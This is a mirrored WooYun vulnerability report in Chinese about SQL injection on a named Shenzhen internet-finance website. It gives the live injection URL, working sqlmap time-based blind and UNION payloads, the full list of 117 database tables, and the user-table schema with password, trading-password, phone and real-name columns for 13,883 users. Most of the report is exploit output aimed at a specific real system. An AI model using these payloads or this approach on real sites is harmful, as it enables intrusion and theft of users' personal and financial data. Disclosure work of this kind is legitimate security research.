乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-27: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-11: 厂商已经主动忽略漏洞,细节向公众公开
深圳市合伙人互联网金融服务有限公司成立于2014年,注册资金五千万元。公司以互联网为媒介,以信息公开透明为准则,为投融资双方的资金需求提供专业的服务。该网站存在SQL注入,涉及上万用户。
注入点:http://www.hhrfs.com/notice/index?p=*
涉及117个表
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.hhrfs.com:80/notice/index?p=') AND (SELECT * FROM (SELECT(SLEEP(5)))LSjn) AND ('HNdB'='HNdB Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: http://www.hhrfs.com:80/notice/index?p=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787671,0x56735877494e56485256,0x717a716b71),NULL,NULL,NULL-- ---web application technology: PHP 5.3.28back-end DBMS: MySQL 5.0.12Database: hhr[117 tables]+---------------------------+| jee_activity || jee_activity_cdkey || jee_activity_gift || jee_admin_user || jee_advert || jee_advert_area || jee_article || jee_article_section || jee_autobid || jee_base_bank || jee_base_city || jee_base_industry || jee_choujiang || jee_contacts || jee_cooperation || jee_creditor || jee_creditor_bak || jee_creditor_info || jee_creditor_info_bak || jee_csai_project || jee_debtor || jee_debtor_bak || jee_debtor_info || jee_debtor_info_bak || jee_email || jee_email_log || jee_email_nosend || jee_entrust || jee_f_product || jee_f_product_group || jee_f_product_info || jee_f_product_order || jee_f_product_order_info || jee_f_product_set || jee_f_product_set_info || jee_feedback || jee_feedback_bug || jee_file_manager || jee_friend || jee_goods || jee_goods_categor || jee_goods_comment || jee_goods_order || jee_guarante || jee_guarante_bak || jee_guarante_bank || jee_guarante_bank_bak || jee_guarante_congruence || jee_guarante_contract || jee_guarante_group || jee_guarante_info || jee_guarante_info_bak || jee_guest || jee_guest_bind || jee_guest_check || jee_guest_check_head || jee_guest_comment || jee_guest_comment_head || jee_guest_money || jee_image_trade_struct || jee_index_money || jee_kaitong_city || jee_links || jee_log || jee_money_config || jee_notice || jee_order || jee_product || jee_project || jee_project_info || jee_qxcj || jee_radar || jee_repo || jee_report_tmp_fee || jee_report_tmp_payplan || jee_report_tmp_userorder || jee_send_tpl || jee_seo || jee_service || jee_sms || jee_sms_log || jee_stamp || jee_subscribe || jee_supplier || jee_supplier_group || jee_supplier_info || jee_tmp_weekuser || jee_tpl_var || jee_user || jee_user_agent || jee_user_bank_bind || jee_user_csaiuser || jee_user_detail || jee_user_email_authentic || jee_user_getmoney || jee_user_group || jee_user_income || jee_user_income_gift || jee_user_income_gift_roll || jee_user_income_grow || jee_user_income_point || jee_user_login_log || jee_user_name_authbank || jee_user_name_authentic || jee_user_name_authweb || jee_user_offline_info || jee_user_phone_authentic || jee_user_property || jee_user_recharge || jee_user_recharge_offline || jee_user_relation || jee_user_study || jee_user_takeadd || jee_user_temp || jee_user_withdrawal || jee_user_work || jee_user_wx |+---------------------------+
涉及13883个用户
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.hhrfs.com:80/notice/index?p=') AND (SELECT * FROM (SELECT(SLEEP(5)))LSjn) AND ('HNdB'='HNdB Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: http://www.hhrfs.com:80/notice/index?p=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787671,0x56735877494e56485256,0x717a716b71),NULL,NULL,NULL-- ---web application technology: PHP 5.3.28back-end DBMS: MySQL 5.0.12Database: hhrTable: jee_user[28 columns]+----------------------------+---------------+| Column | Type |+----------------------------+---------------+| level | int(11) || agent_time | int(11) || agent_userid | int(11) || cpa_amount | decimal(13,2) || cpa_firstinvesttime | int(11) || create_time | int(11) || email | varchar(50) || gift_money | decimal(13,2) || grow_up | int(11) || hits | int(11) || id | int(11) || isagent | tinyint(1) || login_ip | varchar(15) || login_time | int(11) || money | decimal(13,2) || password | char(32) || phone | varchar(15) || point | int(11) || reg_from | varchar(50) || reg_ip | varchar(20) || reg_result | varchar(50) || remark | varchar(100) || stand_guard_total_interest | decimal(10,2) || status | tinyint(1) || tid_code | varchar(50) || trading_password | char(32) || true_name | varchar(50) || user_name | varchar(50) |+----------------------------+---------------+Database: hhr+----------+---------+| Table | Entries |+----------+---------+| jee_user | 13883 |+----------+---------+
包含的用户信息有邮箱、电话、密码、姓名、用户名、交易密码等
未能联系到厂商或者厂商积极拒绝
